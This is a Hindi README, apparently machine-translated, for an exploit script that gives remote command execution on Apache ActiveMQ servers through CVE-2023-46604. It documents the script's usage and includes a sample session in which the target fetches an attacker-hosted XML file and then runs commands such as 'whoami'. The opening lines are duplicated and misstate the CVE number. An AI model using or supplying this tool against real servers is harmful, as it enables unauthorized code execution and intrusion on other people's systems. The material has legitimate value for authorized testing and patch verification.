
यह स्क्रिप्ट CVE-2023046604 (Apache ActiveMQ) का उपयोग करके एक छद्म शेल उत्पन्न करती है। यह कमजोरी OpenWire प्रोटोकॉल के भीतर असुरक्षित डिसीरियलाइज़ेशन के कारण दूरस्थ कोड निष्पादन की अनुमति देती है।
यह स्क्रिप्ट CVE-2023046604 (Apache ActiveMQ) का उपयोग करके एक स्यूडो शेल उत्पन्न करता है। यह कमजोरी OpenWire प्रोटोकॉल में असुरक्षित डिसीरियलाइज़ेशन के कारण रिमोट कोड निष्पादन की अनुमति देती है।
CVE-2023-46604 एक डिसीरियलाइज़ेशन कमजोरी है जो Apache ActiveMQ के OpenWire प्रोटोकॉल में मौजूद है। इस दोष का उपयोग करके एक हमलावर उस सर्वर पर मनमाना कोड निष्पादित कर सकता है जहाँ ActiveMQ चल रहा है। एक हमलावर एक दुर्भावनापूर्ण xml फ़ाइल बना सकता है, जिसके आदेश रिमोट सर्वर द्वारा निष्पादित किए जाएंगे।
यह एक्सप्लॉइट xml दस्तावेज़ निर्माण की प्रक्रिया को स्वचालित और सारगर्भित करता है, फ़ाइल वितरित करने के लिए एक बुनियादी सर्वर प्रदान करता है और POST के माध्यम से लक्ष्य सर्वर से जानकारी वापस प्राप्त करता है। यह रिवर्स शेल को आमंत्रित करने या बाइनरी तैनात करने की आवश्यकता के बिना निरंतर शोषण की अनुमति देता है।
एक्सप्लॉइट स्क्रिप्ट चलाने से पहले, सुनिश्चित करें कि आपके पास:
स्क्रिप्ट को आवश्यकता है:
वैकल्पिक:
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP ActiveMQ Server IP or Hostname
-p PORT, --port PORT ActiveMQ Server Port, defaults to 61616
-si SRVIP, --srvip SRVIP
Serve IP
-sp SRVPORT, --srvport SRVPORT
Serve port, defaults to 8080
$python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.59 -sp 8080
#################################################################################
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
#################################################################################
[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit
#################################################################################
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
#################################################################################
[Target not responding!]$ whoami
activemq
Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x 5 activemq activemq 4.0K Nov 7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov 6 01:18 ..
-rwxr-xr-x 1 activemq activemq 21K Apr 20 2021 activemq
-rwxr-xr-x 1 activemq activemq 6.1K Apr 20 2021 activemq-diag
-rw-r--r-- 1 activemq activemq 17K Apr 20 2021 activemq.jar
-rw-r--r-- 1 activemq activemq 5.5K Apr 20 2021 env
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-32
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-64
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 macosx
-rw-r--r-- 1 activemq activemq 82K Apr 20 2021 wrapper.jar
Apache ActiveMQ$
यह कोड केवल शैक्षिक और नैतिक सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग जिम्मेदारी से और केवल उन वातावरणों में किया जाना चाहिए जहाँ स्पष्ट प्राधिकरण प्रदान किया गया हो। अनधिकृत या दुर्भावनापूर्ण उपयोग सख्त वर्जित है। इस कोड का उपयोग करके, आप अपने क्षेत्राधिकार में लागू सभी लागू कानूनों, विनियमों और नैतिक मानकों का पालन करने के लिए सहमत होते हैं। निर्माता और योगदानकर्ता इस कोड के दुरुपयोग या अनधिकृत उपयोग से उत्पन्न होने वाली किसी भी क्षति या परिणामों के लिए किसी भी देयता से इनकार करते हैं।